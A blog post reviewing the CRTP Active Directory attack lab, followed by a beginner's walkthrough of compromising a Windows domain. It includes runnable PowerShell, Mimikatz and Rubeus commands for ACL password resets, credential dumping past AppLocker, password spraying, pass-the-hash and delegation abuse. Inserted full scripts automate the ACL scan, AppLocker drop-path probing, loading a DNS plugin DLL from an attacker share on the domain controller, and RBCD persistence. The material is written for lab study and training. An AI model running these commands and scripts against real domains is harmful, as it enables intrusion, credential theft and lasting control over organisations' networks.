Review & Sharing Experience: Active Directory (AD) Attack
Intro
First of all, this blog uses the CRTP lab from Pentester Academy for study, and I will preview only some of the exploits from my own understanding, not the full method. It is recommended for people without an AD attack background who want to start as beginners. It uses pure PowerShell exploits and no post-exploitation framework, because it is really for beginners.
The CRTP course provides both a video walkthrough and a walkthrough PDF, and the tools are available in the study lab, so you do not need to worry about being unable to solve the lab; you do, however, have to dig deeper into the details by yourself than the course provides. I wrote this blog because I want to show some methods that the CRTP course does not mention, or does not detail much in the walkthrough, to help you understand AD attacks.
Okay, from this picture it starts with external recon and then a compromised machine. You can try starting like this from ePTXv2, because it teaches external recon from a Kali machine: scan the whole IP network to find which ports can be attacked, or find all users in the company for social engineering, then embed a macro into an Excel file and deliver it via Outlook email (insider attack). You can read the social engineering solution for ePTXv2 in this blog. The attacker may pretend to be some user in the company and send it to the IT department, which has rights to access all servers in the company; once the IT guy opens that macro file, the attacker gets a shell on one server in the company, which is the compromised machine.
But I do not recommend buying ePTXv2 if you have no background in AD attacks. You can read a review from someone here. ePTX is a good course but not friendly for beginners. This is my personal experience, because I bought both ePTXv2 and CRTP and felt that CRTP made me understand more from the basics.
CRTP assumes you have already compromised a server and starts from the internal recon in the picture above, with the main focus on PowerShell commands.
Internal Recon
- Which user are we now? => whoami
- Which groups (and therefore privileges) does our token carry? => whoami /groups
For example:
1) The result shows we are in the group BUILTIN\Administrators
It means we can run commands as local admin and, in the next step, hunt for the credentials of a domain admin. (If our user were a domain admin, the list would additionally contain a domain group such as jefflab\Domain Admins, not only the local BUILTIN group.)
2) The result shows we are not part of the local admins, so we have to escalate our current user to admin, or use membership of some privileged domain group such as dcorp\RDPUsers.
We can enumerate with BloodHound to see what this group can do and which servers in the current domain it has rights to access.
The yellow symbol is the RDPUsers group. After expanding the map it shows all its users; our user is part of RDPUsers, and RDPUsers is admin on the DCORP-ADMINSRV machine. I will come back to this later.
3. Which users are local admins? => net localgroup administrators
Once we know which users are local admins, we can search for passwords left in the description field with this PowerView command
Find-UserField -SearchField Description -SearchTerm "built"
Or try to abuse a GPO to add the current user as local admin. You can read about this technique in the blog "gpo-abuse-and-you", which uses a tool named "metronome.cs" to edit the GPO; that C# code on GitHub targets .NET 3.5, which cannot be used in the CRTP lab, so you may want to build your own AD lab for practice. There is also SharpGPOAbuse for abusing misconfigured GPOs in AD.
A guideline for people who do not know how to compile a .cs file from GitHub into an exe: download .NET from the Microsoft website and compile with csc at C:\WINDOWS\Microsoft.NET\Framework\v[your version number]\csc.exe
About abusing ACLs, I recommend the YouTube talk "Here Be Dragons: The Unexplored Land of Active Directory ACLs". They show how to add and delete permissions on an ACL. See also the ired.team blog, tools such as Invoke-ACLpwn (needs .NET 3.5) for privilege escalation, and Nikhil's blog on the RACE toolkit for abusing ACLs.
In the ACL case, we may find an SPN user or any other useful account for lateral movement to the next machine by checking that our current user has GenericAll on that user, or the User-Force-Change-Password extended right, which lets us reset the password without knowing the current one, and then use PSRemoting with that credential. (GenericWrite alone does not allow a reset; it allows setting an SPN for targeted Kerberoasting or changing the logon script.)
For example, check the ACL entries for the RDPUsers group
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"}
The output shows a GenericAll entry for ControlXUser (Control46User in my lab instance). The IdentityReference column lists the principal that holds the right, so this tells us which account can be taken over; once we compromise it, we can use its rights to add ACL entries for our current user as well. Let's abuse this by resetting the password of ControlXUser. If the current user has rights over this user, the verbose output reports that the password was reset successfully (Set-DomainUserPassword needs the new password in -AccountPassword, so create it first)
$pwd = ConvertTo-SecureString 'Password1234' -AsPlainText -Force
Set-DomainUserPassword -Identity Control46User -AccountPassword $pwd -Verbose
$cred = New-Object System.Management.Automation.PSCredential ("Control46User", $pwd)
Let's find which machines this user is logged on to (Invoke-UserHunter looks for sessions of the given user), since one of them may be able to reach the DC
Invoke-UserHunter -UserName Control46User
For example, if this user has a session on dcorp_test and dcorp_test can jump to the DC, we can use PSRemoting with the credential like this
Enter-PSSession -ComputerName dcorp_test -Credential $cred
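As an added example that is not part of the original post or of PowerView, the following plain-ADSI script answers the same question as the Invoke-ACLScanner filter above, but from the attacker's own token: it lists every user object over which the current user, or any group in the current token, holds a right that permits a password reset. It assumes only that it runs on a domain-joined host as a domain user; the function names are mine.

```powershell
# Added example: enumerate user objects whose password the current token can reset.
# Rights that allow a reset: GenericAll, WriteDacl or WriteOwner (we can grant ourselves
# the right), or the User-Force-Change-Password extended right (directly, or via
# "all extended rights", the null GUID). GenericWrite alone is NOT enough; it allows
# writing servicePrincipalName (targeted Kerberoasting) or scriptPath instead.

function Test-AdRight {
    param(
        [System.DirectoryServices.ActiveDirectoryRights]$Rights,
        [System.DirectoryServices.ActiveDirectoryRights]$Flag
    )
    # Every bit of $Flag must be present. A plain -band would misreport a lone
    # WriteDacl bit as "GenericAll", because GenericAll is a superset mask.
    ([int]$Rights -band [int]$Flag) -eq [int]$Flag
}

function Find-ResettableUser {
    $forceChangePassword = [guid]'00299570-246d-11d0-a768-00aa006e0529'
    $allExtendedRights   = [guid]::Empty

    # SIDs of the current user and every group in the token (local and domain)
    $me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.Filter   = '(&(objectCategory=person)(objectClass=user))'
    $searcher.PageSize = 1000

    foreach ($result in $searcher.FindAll()) {
        $entry = $result.GetDirectoryEntry()
        # Explicit + inherited ACEs, identities as SIDs so we can compare without name lookups
        $rules = $entry.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
        foreach ($rule in $rules) {
            if ($rule.AccessControlType -ne 'Allow') { continue }
            if ($mySids -notcontains $rule.IdentityReference.Value) { continue }

            $right = $null
            if     (Test-AdRight $rule.ActiveDirectoryRights 'GenericAll') { $right = 'GenericAll' }
            elseif (Test-AdRight $rule.ActiveDirectoryRights 'WriteDacl')  { $right = 'WriteDacl' }
            elseif (Test-AdRight $rule.ActiveDirectoryRights 'WriteOwner') { $right = 'WriteOwner' }
            elseif ((Test-AdRight $rule.ActiveDirectoryRights 'ExtendedRight') -and
                    ($rule.ObjectType -eq $forceChangePassword -or $rule.ObjectType -eq $allExtendedRights)) {
                $right = 'User-Force-Change-Password'
            }
            if (-not $right) { continue }

            # Resolve the holder SID to a name for readability; keep the raw SID if that fails
            $holder = $rule.IdentityReference.Value
            try { $holder = $rule.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value } catch {}

            [pscustomobject]@{
                Target = [string]$entry.Properties['sAMAccountName'].Value
                Holder = $holder
                Right  = $right
            }
        }
    }
}

# Usage: one row per (target, holder, right). Deny ACEs are not evaluated here, so
# confirm a hit with Set-DomainUserPassword -Verbose before relying on it.
Find-ResettableUser | Sort-Object Target, Holder -Unique | Format-Table -AutoSize
```

The script reads every user's security descriptor, so it is fine for a lab but slow in a large domain; scope the DirectorySearcher to an OU if you need to.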
For Windows privilege escalation, you can use tools like PowerUp, BeRoot, Privesc.ps1 and so on. I think this PDF will help guide you through AD attacks.
You may find credentials in the registry, a misconfigured service to abuse, or remote code execution through DLL hijacking.
Can we find users whose password never expires and who use a bad password?
Command to find enabled accounts whose password never expires
get-aduser -filter * -properties Name, PasswordNeverExpires | where { $_.passwordNeverExpires -eq "true" } | where {$_.enabled -eq "true"}
Command to check the bad-password count
Get-UserProperty -Properties badpwdcount
Command to check the password policy
Get-ADDefaultDomainPasswordPolicy
Create a wordlist of passwords that match the policy and try a password spray with CrackMapExec to find which password can be used to log in as an admin user on our server. See the tutorial from STEALTHbits here.
4. What is the current domain name? => Get-NetDomain
The result shows both the domain controller name and the forest root domain name
5. What is the domain controller name? => Get-NetDomainController
6. Who are the domain admins of the current domain? => Get-NetGroupMember -GroupName 'Domain Admins'
7. Who are the domain admins of the forest root domain (Enterprise Admins)? => Get-NetGroupMember -GroupName 'Enterprise Admins' -Domain <forest domain name here>
Assume we are local admin now. The next step is lateral movement to become domain admin in the current domain, to find credentials on the DC that let us jump to the forest root domain, and to stay persistent on the DC so we can come back again and again to collect information.
Lateral Movement to Domain Admin
1. By jumping to another machine that can reach the Domain Controller
1.1 Local admin access (derivative admin)
We can use the PowerView module to check on which machines our current user has local admin access
Find-LocalAdminAccess -Verbose
Or use the PowerView module in PowerShell Empire to check local admin access
Using a module in PowerShell Empire works the same way as Metasploit: type info to see which parameters are Required True (need a value), then execute to run the module
You can learn more about PowerShell Empire here
It shows the same result: the current user can access the dcorp-adminsrv machine. Let's use BloodHound to check this machine
We find that the machine DCORP-ADMINSRV has an AppLocker policy applied. We can check the effective AppLocker policy on this machine with this command
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
One interesting rule in the AppLocker policy allows all members of the Everyone group to run scripts located in the Program Files or Windows folders. Since we are local admin on dcorp-adminsrv, we can drop a script into one of those paths over the admin share and then run it inside the machine without AppLocker blocking it
Copy-Item .\Invoke-MimikatzEx.ps1 '\\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\Program Files'
and after we enter the adminsrv remote session and execute the script, Invoke-Mimikatz dumps all credentials on this machine
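Before copying anything, it is worth checking which AppLocker-allowed paths the current user can actually write to, because the default rules allow Everyone to execute from Program Files and Windows precisely because ordinary users cannot write there. The following script is an added example, not part of the original post or the CRTP course; it is meant to run inside the remote session on the target (dcorp-adminsrv in the lab) and the function name is mine.

```powershell
# Added example: for every effective AppLocker Script/Exe path rule that allows Everyone
# (S-1-1-0), expand the AppLocker path variable and test whether the current user can
# create a file there. A row with Writable = True is a drop location that AppLocker will
# not block. Run this in the session on the target machine.

function Get-AppLockerAllowedWritablePaths {
    param(
        # Rule collections to inspect; Script covers .ps1, Exe covers .exe
        [string[]]$Collections = @('Script', 'Exe')
    )
    $policy = Get-AppLockerPolicy -Effective
    foreach ($collection in $policy.RuleCollections) {
        if ($Collections -notcontains $collection.RuleCollectionType) { continue }
        foreach ($rule in $collection) {
            # Only Allow rules for Everyone that are path-based are interesting here
            if ($rule.Action -ne 'Allow') { continue }
            if ($rule.UserOrGroupSid -ne 'S-1-1-0') { continue }
            if (-not $rule.PathConditions) { continue }
            foreach ($cond in $rule.PathConditions) {
                # AppLocker stores paths with its own variables, e.g. %PROGRAMFILES%\*
                $raw = $cond.Path
                $expanded = $raw.Replace('%PROGRAMFILES%', $env:ProgramFiles).
                                 Replace('%WINDIR%', $env:windir).
                                 Replace('%SYSTEM32%', "$env:windir\System32").
                                 Replace('%OSDRIVE%', $env:SystemDrive)
                $dir = $expanded.TrimEnd('*').TrimEnd('\')
                $writable = $false
                if (Test-Path -LiteralPath $dir) {
                    # Create and delete a probe file; any exception means not writable
                    $probe = Join-Path $dir ('.' + [guid]::NewGuid().ToString('N'))
                    try {
                        [IO.File]::WriteAllText($probe, '')
                        Remove-Item -LiteralPath $probe -Force
                        $writable = $true
                    } catch { $writable = $false }
                }
                [pscustomobject]@{
                    Collection = $collection.RuleCollectionType
                    Rule       = $rule.Name
                    Path       = $raw
                    Directory  = $dir
                    Writable   = $writable
                }
            }
        }
    }
}

# Usage: paths the current user can drop a script into and still execute under AppLocker
Get-AppLockerAllowedWritablePaths | Format-Table -AutoSize
```

Two caveats: an interactive admin session is subject to UAC token filtering, so Program Files may show as not writable there even though the same user writes to it over the c$ share or in a WinRM session; and a rule can carry exceptions (subfolders of Windows that are user-writable are excluded by the default rules), which this check does not evaluate.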
1.2 Check all live machines and open ports to get access to them
Get-NetComputer -Ping
Check the IP of each machine with ping
ping dcorp-ci.dollarcorp.moneycorp.local
Use Invoke-PortScan on the whole IP range found from the ping results
Invoke-PortScan -StartAddress 172.16.2.1 -EndAddress 172.16.100.100 -ScanPort
We may see a machine with port 80 open and obtain a reverse shell through that website
Caution when jumping from machine 1 to machine 2 to find further machines: focus on dumping the credential hashes of all users on each new machine with Invoke-Mimikatz, for pass-the-hash to the domain controller, and use Invoke-UserHunter -CheckAccess to find, from the current machine, the Domain Controller or any machine holding credentials that can access the Domain Controller
1.3 Constrained delegation user
Step 1: Find users configured for constrained delegation
. C:\AD\Tools\Powerview_dev.ps1
Get-DomainUser -TrustedToAuth
We see that user websvc is allowed to delegate to the service cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL. (This technique may not give access to the domain controller directly, but in some cases we may find a constrained delegation account allowed to delegate to the file share service on the domain controller.)
In the CRTP course, the instructor uses kekeo to create the ticket and dir to check that we have read access on that machine. From that point you can use PsExec.exe to access the machine and run commands.
Or use Rubeus.exe to create the ticket and impersonate the admin to gain access to the machine with the /altservice parameter, which kekeo does not have.
Step 2: Use Rubeus to request a TGT for the constrained delegation account
.\Rubeus.exe asktgt /user:websvc /domain:dollarcorp.moneycorp.local /rc4:<websvc ntlm hash value>
Step 3: Copy the whole base64 value into a text file named websvc.txt, then load its contents into the variable $b64. (Rubeus asktgt also accepts /outfile:<path> to write the .kirbi directly and /nowrap to print the base64 on one line, which saves this step.)
Step 4: Create the kirbi file from the base64 value
[IO.File]::WriteAllBytes("c:\AD\Tools\temp\websvc_axis.kirbi", [Convert]::FromBase64String($b64))
Step 5: Use Rubeus S4U with the ticket to gain access to dcorp-mssql
.\Rubeus.exe s4u /domain:dollarcorp.moneycorp.local /impersonateuser:administrator /msdsspn:"cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ticket:c:\AD\Tools\temp\websvc_axis.kirbi /altservice:http /ptt
Verify that the ticket was injected successfully
Gain access to dcorp-mssql
You can learn how to use kekeo from the CRTP course; I just want to show that Rubeus can do this case too. Note that Rubeus s4u can also take /user and /rc4 directly (as in the RBCD section below), which skips the asktgt and kirbi steps, and that impersonating an arbitrary user from the account's key alone only works when the account has protocol transition ("Use any authentication protocol") enabled; otherwise you need a real user's service ticket via /tgs.
2. By privilege escalation to a privileged user on the Domain Controller
2.1 Domain password spray with DomainPasswordSpray from this GitHub
Import-Module .\DomainPasswordSpray.ps1
Step 1: Find all users in the domain and save them to users.txt
Get-DomainUserList -Domain dollarcorp.moneycorp.local -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii users.txt
Step 2: Check the domain password policy and create a password list that satisfies it
Import-Module .\Microsoft.ActiveDirectory.Management.dll
Import-Module .\ActiveDirectory\ActiveDirectory.psd1
Get-ADDefaultDomainPasswordPolicy
Step 3: Run the domain password spray
Invoke-DomainPasswordSpray -UserList users.txt -Domain dollarcorp.moneycorp.local -PasswordList password.txt -OutFile sprayed-creds.txt
From a password spray you may get a domain admin account, or any useful account that can access a machine to dump the credentials of a privileged user
After getting a plaintext password, we can use PowerShell remoting with the credential, or use the DSInternals module to convert it to an NTLM hash and use Mimikatz for pass-the-hash
Import-Module .\DSInternals.PowerShell
Import-Module .\DSInternals.Common.dll
Import-Module .\DSInternals\DSInternals.psd1
$pwd = ConvertTo-SecureString 'Password1234' -AsPlainText -Force
ConvertTo-NTHash $pwd
2.2 DNSAdmins to Domain Admin
- First we need to know who is in DNSAdmins
Get-NetGroupMember -GroupName "DNSAdmins"
- Confirm whether we are in the DNSAdmins group with whoami /groups
- If we are not a member of DNSAdmins, we have to find credentials of such a user by checking which machines both our current user and the DNSAdmins member have access to
Invoke-UserHunter -UserName srvadmin
- then pass the hash of user srvadmin with Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /ntlm:<ntlm value> /run:powershell.exe"'
- It requires the DNS Server role to be running; if you are an administrator, you can open Server Manager, click 'Add roles and features' and add the DNS Server role
Abuse the DNS server setting serverlevelplugindll to load a malicious DLL into the DNS service on the domain controller; the DLL must be readable by Everyone (the DC's machine account is what actually reads it)
You can continue reading the details in Nikhil's blog, where he explains how to adjust the DLL code in kdns.c into a reverse PowerShell. Another technique worth watching is ippsec's video on 'Resolute', where he builds a reverse shell on the DNS server by adjusting the code of dns-exe-persistent to import a reverse PowerShell function, which is stable and does not crash the DNS service the way an msfvenom DLL does. This Medium blog explains why it is 'serverlevelplugindll'.
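The post describes the setting but not the commands, so here they are as an added example (not from the original post or Nikhil's blog): setting ServerLevelPluginDll with dnscmd as a DNSAdmins member, verifying what the service will load, restarting it, and clearing the value afterwards. The DC name and the UNC path are assumptions; the function names are mine.

```powershell
# Added example: DNSAdmins ServerLevelPluginDll abuse with dnscmd.
# dnscmd talks to the DNS server over RPC, which is why DNSAdmins membership is enough
# to write the value; the DC's DNS service then loads the DLL as SYSTEM on restart.

$DnsServer  = 'dcorp-dc.dollarcorp.moneycorp.local'
$PluginPath = '\\172.16.100.1\dll\mimilib.dll'   # assumed attacker share; the DC must be able to read it

function Set-DnsPluginDll([string]$Server, [string]$Dll) {
    # Writes HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll on the server
    dnscmd $Server /config /serverlevelplugindll $Dll
}

function Get-DnsPluginDll([string]$Server) {
    # Read the value back through the Remote Registry service; this needs remote registry
    # access on the DC (administrators by default), so use it for verification once you have it
    $hklm = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $Server)
    $hklm.OpenSubKey('SYSTEM\CurrentControlSet\Services\DNS\Parameters').GetValue('ServerLevelPluginDll')
}

function Restart-RemoteDns([string]$Server) {
    # Restarting the service is a separate permission that DNSAdmins do not automatically hold;
    # check that it works in your lab before relying on it
    sc.exe \\$Server stop dns
    Start-Sleep -Seconds 5
    sc.exe \\$Server start dns
}

function Remove-DnsPluginDll([string]$Server) {
    # Cleanup: calling /config without a value clears the setting so the service starts clean
    dnscmd $Server /config /serverlevelplugindll
}

Set-DnsPluginDll -Server $DnsServer -Dll $PluginPath
Restart-RemoteDns -Server $DnsServer
# When finished, restore the DNS server (and restart it again) so the DC stays healthy:
# Remove-DnsPluginDll -Server $DnsServer; Restart-RemoteDns -Server $DnsServer
```

Use a DLL built for this purpose (mimilib, or the kdns.c / dns-exe-persistent code the post mentions): a DLL that does not export the plugin functions correctly makes the DNS service fail to start, which on a DC is noticed quickly.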
Persistence
The reason persistence is needed is that once the attacker has reached the forest domain, they can come back to steal data from servers at any time
There are many methods that the CRTP course covers in the walkthrough PDF, but I will show one method they do not teach: resource-based constrained delegation (abusing RBCD) by creating a fake machine account in the domain
Step 1: Check the machine account quota of the domain
Get-ADObject ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota
It shows a machine account quota of 10 (the default), so any authenticated user can add up to 10 computer accounts
Step 2: Use the Powermad module to create a fake machine account in the domain
import-module .\Powermad.ps1
New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Step 3: Check the SID of the fake machine we just created
Step 4: Use pass-the-hash to run PowerShell as Domain Admin and configure RBCD on the domain controller
Set-ADComputer DCORP-DC$ -PrincipalsAllowedToDelegateToAccount FAKE01$ -Verbose
Step 5: Verify that the Domain Controller now allows the fake machine to delegate to it
Get-ADComputer DCORP-DC$ -Properties 'msds-allowedtoactonbehalfofotheridentity'
Get-ADComputer DCORP-DC$ -Properties PrincipalsAllowedToDelegateToAccount
Step 6: Convert the password we set on the fake machine to its NTLM hash
$pwd = (ConvertTo-SecureString '123456' -AsPlainText -Force)
ConvertTo-NTHash $pwd
# NTLM hash of the fake machine's password = 32ed87bdb5fdc5e9cba88547376818d4
Step 7: Regain access to the domain controller with the NTLM hash of the fake machine
Rubeus.exe s4u /domain:dollarcorp.moneycorp.local /user:FAKE01$ /rc4:32ed87bdb5fdc5e9cba88547376818d4 /impersonateuser:administrator /msdsspn:"cifs/dcorp-dc.dollarcorp.moneycorp.local" /ptt
Recommended learning platforms for red teaming
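Set-ADComputer hides what is actually written: msDS-AllowedToActOnBehalfOfOtherIdentity is a binary security descriptor whose DACL lists the principals allowed to delegate, and Set-ADComputer replaces the whole value. The following is an added example (not from the original post) that does Steps 3, 4 and 5 with plain ADSI, so it works from a pass-the-hash PowerShell without the ActiveDirectory module, decodes the attribute back to account names for verification, and removes it for cleanup. Computer names are the lab's; the function names are mine.

```powershell
# Added example: configure, verify and remove RBCD on a computer object via ADSI.
# Needs Domain Admin, or at least write access to the target's
# msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

function Get-AdComputerEntry([string]$Name) {
    $s = New-Object System.DirectoryServices.DirectorySearcher
    $s.Filter = "(&(objectCategory=computer)(sAMAccountName=$Name`$))"
    $r = $s.FindOne()
    if (-not $r) { throw "computer account $Name not found" }
    $r.GetDirectoryEntry()
}

function Get-ComputerSid([string]$Name) {
    # Step 3: the SID is what goes into the security descriptor, not the name
    $bytes = (Get-AdComputerEntry $Name).Properties['objectSid'].Value
    (New-Object System.Security.Principal.SecurityIdentifier($bytes, 0)).Value
}

function Set-Rbcd([string]$Target, [string]$Principal) {
    # Step 4: owner BUILTIN\Administrators, DACL with a single Allow ACE of full control
    # for the principal. The access mask only has to be non-empty; the KDC checks the SID.
    $sid = Get-ComputerSid $Principal
    $sd  = New-Object System.Security.AccessControl.RawSecurityDescriptor("O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$sid)")
    $bytes = New-Object byte[] $sd.BinaryLength
    $sd.GetBinaryForm($bytes, 0)
    $entry = Get-AdComputerEntry $Target
    $entry.Properties['msDS-AllowedToActOnBehalfOfOtherIdentity'].Value = $bytes
    $entry.CommitChanges()
}

function Get-RbcdPrincipals([string]$Target) {
    # Step 5: decode the descriptor and translate each ACE SID back to an account
    $bytes = (Get-AdComputerEntry $Target).Properties['msDS-AllowedToActOnBehalfOfOtherIdentity'].Value
    if (-not $bytes) { return @() }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($bytes, 0)
    foreach ($ace in $sd.DiscretionaryAcl) {
        # A SID that no longer resolves (e.g. FAKE01 was deleted) is returned raw
        try { $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $ace.SecurityIdentifier.Value }
    }
}

function Remove-Rbcd([string]$Target) {
    # Cleanup: clearing the attribute disables RBCD on the target entirely
    $entry = Get-AdComputerEntry $Target
    $entry.Properties['msDS-AllowedToActOnBehalfOfOtherIdentity'].Clear()
    $entry.CommitChanges()
}

# Usage, from the Domain Admin PowerShell of Step 4
Set-Rbcd -Target 'DCORP-DC' -Principal 'FAKE01'
Get-RbcdPrincipals -Target 'DCORP-DC'     # expect dcorp\FAKE01$
```

Because the attribute is replaced rather than appended to, read it first with Get-RbcdPrincipals on any real target: if legitimate principals are already listed, overwriting them breaks whatever delegation they were doing, which is both noisy and unkind to the environment.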
CRTP -> CRTE -> PACES + offshore + rastalab/ ePTXv2 (optional) -> CRTO
HackTheBox machines for practising AD attacks (BloodHound, PowerView)
Cascade
Sauna
Monteverde
Sizzle
Lightweight
Forest
Active
RE
Access
Reel
Arkham
Bastion
Giddy
**Good blog: Sauna writeup for getting started with Covenant here (you can read more about the Covenant framework here)
**Good blog: Vault writeup for learning SOCKS4 proxying here
TryHackMe rooms for practising AD attacks
Attacktive Directory
Post-Exploitation Basics
Active Directory Basics
Attacking Kerberos
CyberSecLabs machines for practising AD attacks
Roast
Brute
Office
Mount
Dictionary
Sync
Casino